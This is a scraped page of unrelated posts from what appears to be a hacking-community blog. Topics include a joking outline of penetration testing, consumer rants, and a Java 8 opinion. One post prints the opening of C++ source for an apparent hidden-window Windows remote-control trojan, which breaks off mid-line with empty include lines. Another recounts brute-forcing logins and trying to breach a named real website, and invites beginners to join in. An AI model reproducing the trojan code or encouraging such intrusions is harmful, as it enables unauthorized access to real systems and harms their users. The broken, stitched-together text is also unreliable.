Blogs

steps of pen testing

There are four basic steps of Penetration Testing…….Well the fifth one is filing the report but you don’t need to know THAt!! SO, 5 steps of awesomeness. These steps area as follows:
1. Information Gathering : The more you know about the target, the more easily its going to be for you to influence him. The easier to influence will in turn make you avail to more information, and more influence and more information and on and on and on until you know everything about that target……..OH LOOK!! YOU HAVE A LIFE PARTNER NOW!!
2. Scanning : Information is gathered at first, now you gotta find out the information available for that moment. That is accomplished by scanning. it is used to know whether the host is up, which port is open and then finding vulnerability a structural weakness if you will. No system is invincible, there is a kryptonite for every superman. THAT’s what the purpose of scanning is, finding the superman system’s kruptonite.
3. Sniffing: Its more like a blood hound activity, finding the weakness and sniff out whatever you can from the cracks or in the system’s case passwords, usernames, secrets normally anything not everyone would want you to see. in kali sniffing techniques include wireshark, ettercap etc. Then the companies will ask you to fix this, and yo ass get paid.
4. Exploitation: Now the stage is a set, you know the info, the weaknesses, the passwords. Its now time to whoop them up for action. Expliotation deals with exploiting whatever the attacker has gathered in the last 3 steps and then explioting the system, or the organization. Its the final test that a Pen-Tester use to look down on companies and say”YOU ARE WEAK!!” and then the companies ask them for tips on how to fix it.
“Nothing in the world is impenetrable, Invincibility is an illusion used on the people so they can look the other way and get their ass handed to them”

Amp Blasts: Best Buy

Ya know, there are times where many people want to be able to get movies, music, games, and some PC hardware. The reality is though that for many people who don't like in major metropolitan areas in the US, the choices are limited with regards to brick and mortar. This would eventually result in the one place to go becoming none other than Best Buy. However, I feel that Best Buy is not only on the way out, but has done a considerable amount of damage with regards to consumer quality with the spectacularly terrible decisions they have made over the years.

First, most of the electronics sold are hardly quality. The two major cable suppliers are Dynex and RocketFish, both owned by Best Buy themselves and typically are very poor quality with an up-marked price tag when compared to similar cables online that reaches astronomical levels of what the fuck. Then there are the low quality PC products that they sell, which includes their 'high end' since most of the laptop models utilize one heatsink pipe for both the GPU and CPU. The biggest what the hell is the extra warranties that they attempt to sale which to me feels dirty since many times there can be loose verbiage to avoid payout once the standard warranty is at an end. Overall, don't bother getting electronics here.

Second, there is the matter of it's video selection, or rather the increasing lack thereof. Now, I am actually of the opinion that they made the right move to reduce the anime footprint cause quite frankly, anime does not make money in this day and age. However, the general selection has become nothing short of abysmal and there is an insistence of pushing the site to store option which barely has any better of a selection and will take a considerable amount of time to arrive. The end result is that for people wanting a good DVD/Blu-Ray selection, go on Amazon or other online vendors.

A word on Java 8

I heard about the buzz regarding the recent Java 8 release and it's usage of Lambda expressions and honestly, it's nothing to get very excited about. Yes, it makes code more readable, but the reality is that the majority of other languages including the C++11 standard beat them to the punch in doing this. The bigger concern is that rather than being proactive, Oracle's approach to security has been reactive which hurts the language badly. At this point, they need to rethink their strategies a bit as more and more, many people like myself are avoid Java based applications and development when possible.

Current OFACE status

I'd figure I'd pop in and chat a bit about OFACE at this point. One of the things that was stopping me from finalizing an alpha and over time became the Moby Dick to my Captain Ahab were my attempts to find a non-GUI equivalent to TDSSKiller. After discussing the matter with RaT however, I have made the difficult decision to move forward without this for the time being. I will be piecing everything together when availability permits as I am only able to work on this on an after hours basis at this point. Once an alpha is tested as working and released, I will discuss future plans for the further development of OFACE with RaT.

Obamacare'd

Based on http://www.cbsnews.com/news/obamacare-website-flagged-in-heartbleed-review/ What people foolish enough to use this site are thinking....

im mad so i bloged about it!

i got so mad on irc i decided i needed to seek help so i called thats right SUE BASKO!

hi


#undef _WIN32_WINNT //For hiding/showing window
#define _WIN32_WINNT 0x0500
#include //Required for socket init
#include
#include
#include
#include
#include
#include
#include

using namespace std;

//function declaration prototypes
void crazyMouse(BOOL cmProc);
void Matrix(BOOL pwnProc);
char procCmd(char buff[200], SOCKET * fSocket);
void PoP(char message[200]);

// static variables (Dont know why i did this)
static BOOL pwnProc = false;
static BOOL pop = false;

//pointer to socket
SOCKET * pSock;
//for matrix
HWND hWnd = GetConsoleWindow();

int main(){

// First thing we want to do is make sure that our console is in-fucking-visible
ShowWindow( hWnd, SW_HIDE );

//Begin winsock chunk
char buf[256];
WSAData wsdata;
WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and pointer to implement
if(nret != 0){ //Init failed
/*A successful return value should be 0 */
std::cout<<"Startup failed, error code: "<

my first trial on http://www.cellufun.com

i had a serious surgery. during recovery i found a small java based wap site called http://cellufun.com upon playin i found it to be full of childmolesters hiding behind pixel avitars though i dont have the authority heheheh i have found myself cleaning up the corrupted site . removing and exposing the pedofiles is fun but now old tactics do not work . i have a list of t argets but i am stuck i cant seem to penetrate the server or brute force logins anymore. yes this is small potatoes to some but it is quite entertaining watching the chatroom cry Smile feel free to join in the fun it is great practice for beginning level starters.

Flair's blog site

Any new hints for newbies in the site maybe posted here if by any chance I get them. So if you are a script kid or a newbie and have a problem, you can post them here.

Syndicate content